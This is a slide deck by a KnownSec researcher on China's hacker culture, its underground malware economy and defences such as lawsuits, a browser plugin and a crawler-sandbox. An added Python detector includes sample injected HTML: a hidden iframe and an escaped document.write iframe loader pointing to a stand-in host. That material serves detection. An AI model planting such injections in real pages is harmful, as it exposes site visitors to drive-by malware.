Front Line Report: Fighting Against Malware in China
ZhaoWei, KnownSec
Who am I? Who are we?
About This Presentation
1. Part One: China hacker culture
2. Part Two: Underground industry
3. Part Three: How we fight back?
Where are they from? Where are they heading?
Blackhats and Whitehats: Where did we start?
Where did we learn?
• Coolfire 1996
• Isbase 1997
• Xfocus 1999
• Hack.co.ca
• Packetstorm
• Core Security
• w00w00
• Bugtraq
• Phrack
• EFNET
• TESO
• The Hacker's Choice
• Daily Dave
• FD
• ……
Timeline:
• Unix hacking
• Stack overflow
• Format string
• Heap overflow
• Int overflow
• SQL injection
• Backdoor
• Kernel rootkit
• Worm (Code Red…)
• Mass injection
• XSS and worm
• Web 2.0
Blackhats and Whitehats: 4 waves
1. Server Side Wave 1998-2003
 1) IIS, Serv-U, Apache, Samba, Jabberd etc.
2. Client Side Trend 2002-2007
 1) Image formats: ANI, JPG, BMP etc.
 2) Windows Office: doc, ppt etc.
 3) IE: ActiveX, HTML parser, XML parser
3. 3rd party application attacks 2006-now; this wave is only for profit
Blackhats and Whitehats: What are they doing now?
• WhiteHat: MOST of them are working for security companies (M, K, S, V, N, T)
 o Security research: anti-(virus, rootkit, exploit); developing scanners and IDS etc.
 o Finding 0days in Windows, Linux, Unix; developing exploits
 o Boring? So sometimes they get leaked: ZDI, underground market
Blackhats and Whitehats: What are they doing now?
• BlackHat: they have their own industry!
 o Developing worms, rootkits, 0days
 o DDoS websites for profit and fun (China has the best anti-DDoS devices)
 o Stealing all the cool things they like: all kinds of games (WOW!), they control the virtual economy; QQ, 支付宝 (Alipay, Taobao), anything related to money; even some private porn
 o Competition on developing exploits? No, on who can pay more money.
Blackhats and Whitehats: Famous Cases
Blackhats and Whitehats: Trend
1. Age: younger! (maybe not), talented and rich
2. Area: most are not from the big cities
 o Why? Economy related?
 o More fired engineers, more hackers?
3. Blackhat culture: Baidu Zhidao, forums, QQ
4. Underground industry: everyone has a role
5. Where: more public forums or QQ, not IRC anymore
6. International? Not yet!
Underground Malware Industry
Underground Malware Industry: Now
China is not only the world's factory, but also the world's malware factory.
They totally changed our life:
1. My parents' computer!
2. Changed how people use the network/internet
3. Users are pushed to learn security
Underground Malware Industry: Terms
• 挂马 (GuaMa), Hooking Horse: inject malcode into websites
• 网马 (WangMa), Net Horse: exploits for IE
• 木马 (MuMa), Wood Horse: backdoor, rootkit, downloader etc.
• 箱子 (XiangZi), Box: a web service that stores stolen information
• 信封 (XinFeng), Envelope: data containing stolen information
• 免杀 (MianSha): bypass the anti-virus
• …
Underground Malware Industry: Map
[Diagram: ecosystem map. Nodes: E-Dealer, G-Dealer, Sub-dealer, re-sellers, Gaming Team, Traffic Vendor, Security Researcher, Crack/Steal Box, Website Cracker, Plugin Vendor, Virus Developer, Internet Users, E-Property Buyer, Org or Individual, Website/Pages, Mal Hosting, Internet. Areas: Technical Area, Cracker Area, E-Property Trading. Flow labels: Controlled Traffic, Inject Mal-Code, Surf Internet, Owned Website/Traffic, Victim controlled/Privacy leak, Selling all kinds of information, Latest hacking tech, Latest virus and malware, PAY, SALES, $$.]
Underground Malware Industry: Trend
1. From 06-07 they started using 3rd party vulns. Why?
 1) Very big local market and a huge number of users
 2) Users know more about security now (patch the system, use anti-virus etc.)
 3) Some local security vendors supply a patch service to pirated Windows users (they all love it)
 4) Windows 0days are really expensive now
 5) Local application vendors are totally lame (sell them Fortify!)
2. They use 0days in massive attacks. I never saw this before 2006; this is definitely a phenomenon
3. More 0days?
 1) RealPlayer
 2) Flash
 3) XunLei*
 4) UUSee
 5) Sina
Underground Malware Industry: Technique Trend
1. They like exploiting logic bugs
 1) Baidu Toolbar
 2) Snapshot
2. Anti anti-virus: detect if anti-virus exists
3. Bypass anti-virus: they charge money to make your malware bypass:
 1) Kaspersky
 2) Nod32
 3) Rising
 4) Kingsoft
Underground Malware Industry: Underground 0day Market
1. They love client-side vulnerabilities
 1) Maybe they are easier to find
 2) They love local application bugs: cheaper and useful
2. The price is more exciting than ZDI
 1) Researchers like ZDI
 2) Blackhats don't; they just use it
3. Sometimes 0days are leaked to the market
 1) Security researchers
 2) Professional whitehats
Underground Malware Industry: Real Case
It's the most powerful malware hosting box in China: massive injection worm!
Underground Malware Industry: Next?
• Web 2.0? SNS worms
• Interactive web malware
• Interact with the user to do anti anti-virus
• Authentication
• Flash AS
• Silverlight?
How We Fight BACK!
• Law: sue them!
• Tech: China web reputation system
How We Fight BACK! Rogue Software
• We started the China Anti-Malware Alliance in 2006
• We collected evidence and we sued them
 • Yahoo China
 • eBay China
• Won only 1 of 9 cases; we won the Shanghai case
• Some of them are really powerful in their local area
How We Fight BACK! Rogue Software
• Definition of rogue software now. We win!
A call for input from the general public was made on November 8, when the ISC published its draft proposal and wanted to find out how Chinese web surfers felt about the problem.
Spyware/Adware must also meet at least one of the following additional criteria as set out in Chinese sources:
• Be installed without notification or approval
• Not offer an uninstall service or remain after removal
• Make changes to the user's browser or any other settings without permission, disabling access to the Internet or forcing visits to certain websites
• Trigger pop-ups
• Collect user data without notification or permission
• Mislead users into uninstalling non-malicious software
• Be bundled with other known malware
• Have any other issues that infringe the user's "right to know" and "right to choose."
How We Fight BACK! Malware
• The true problem:
 • 80-90% of victims got infected from the web
 • Vulnerabilities in Internet Explorer and 3rd party applications
 • 0day world! Using 0days to attack people
• What can we do for users?
 • Make a safer IE?
 • Make a clean/trustworthy web?
How We Fight BACK! Malware
• An IE security enhancement: a security plugin our company made, 365menshen (365门神)
 • Anti-phishing, HIPS
 • Marks out malware URLs
 • Supplies some web services for customers
• There are other services: SiteAdvisor, Finjan, MyWOT
• Also IE8 is much better than previous versions
How We Fight BACK! 365menshen
How We Fight BACK! Web
• Make a cleaner web
 • We need to find all the bad websites in China
 • We need signatures, a sandbox and a crawler
• Make a more trustworthy web
 • We need anti-phishing
 • Maybe PhishTank
 • Need a trusted source
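As an added example (not code from the slides or from ScanW), a page-level signature check of the kind the crawler above needs to find GuaMa-style injections: it flags zero-size or hidden iframes and scripts that write an escaped iframe. The sample page and the malhost.invalid host are constructed; scan_page returns (signature, detail) pairs for one fetched page.

```python
import re
from html.parser import HTMLParser
# Constructed sample page (not a real site): normal content plus two injected
# GuaMa-style payloads: a zero-size hidden iframe and an escaped iframe writer.
SAMPLE_HTML = """<html><body><h1>Welcome</h1>
<iframe src="http://malhost.invalid/wm.htm" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http://malhost.invalid/x.htm%22%3E'));</script>
<p>Normal content</p>
<iframe src="/video/embed" width="640" height="360"></iframe>
</body></html>"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
ESCAPED_WRITER = re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)

class InjectionFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            zero = (a.get("width", "").strip() in ("0", "0px")
                    or a.get("height", "").strip() in ("0", "0px"))
            if zero or HIDDEN_STYLE.search(a.get("style", "")):
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True

    def handle_data(self, data):
        if self._in_script:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body, self._script = "".join(self._script), []
            # Unescaping "%3Ciframe" into document.write is the classic
            # obfuscated injection; plain scripts are left alone.
            if ESCAPED_WRITER.search(body) and "%3ciframe" in body.lower():
                self.findings.append(("escaped_iframe_writer", body[:60]))

def scan_page(html):
    finder = InjectionFinder()
    finder.feed(html)
    finder.close()
    return finder.findings
```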
How We Fight BACK! Crawler and Sandbox
• We are not Google
 • Lacking enough bandwidth
 • Not enough servers (just mist/water vapor rather than a cloud)
 • So these make our sandbox different
• The main idea is not to get infected
 • Lightweight, faster
 • Behavior based (APIs)
 • Suitable for China
How We Fight BACK! Crawler and Sandbox: ScanW
• We started in 2006
• We learned from:
 • Google Safe Browsing
 • Microsoft HoneyMonkey
 • McAfee SiteAdvisor
• We are based on:
 • VMware Server 2.0
 • Python 2.5
 • Django 1.0
 • C
• We are trying to move these things to:
 • Google App Engine (GFW?)
 • Or using Hadoop (Java)?
Demo
1. Ecosystem plus free anti-virus software
2. Pushing SDL to software vendors
3. Web server side ecosystem?
China Marketing
Q/A. Thank You!
ic@scanw.com